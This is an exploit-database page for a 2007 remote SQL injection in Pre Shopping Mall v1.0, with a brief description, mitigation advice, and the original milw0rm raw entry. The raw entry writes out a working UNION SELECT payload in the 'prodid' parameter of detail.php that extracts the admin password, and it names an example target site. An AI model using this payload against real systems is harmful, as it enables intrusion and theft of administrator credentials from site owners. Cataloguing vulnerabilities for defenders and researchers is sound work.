header-logo
Suggest Exploit
vendor:
Pre Shopping Mall
by:
Cyber-Security.org
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Pre Shopping Mall
Affected Version From: Pre Shopping Mall v1.0
Affected Version To: Pre Shopping Mall v1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Pre Shopping Mall v1.0 Remote SQL Injection

The exploit allows an attacker to perform a SQL injection attack by modifying the 'prodid' parameter in the 'detail.php' page. By injecting a specific payload, the attacker can retrieve the password hash of the admin user.

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and parameterized queries to prevent SQL injection attacks. Regular security updates and patches should also be applied.
Source

Exploit-DB raw data:

==============================================

Pre Shopping Mall v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Exploit:
detail.php?prodid=-1/**/union/**/select/**/0,1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*

==============================================

Example: http://preproject.com/emall/

==============================================

# milw0rm.com [2007-05-03]

Navigation

Suggest Exploit

Services By CQR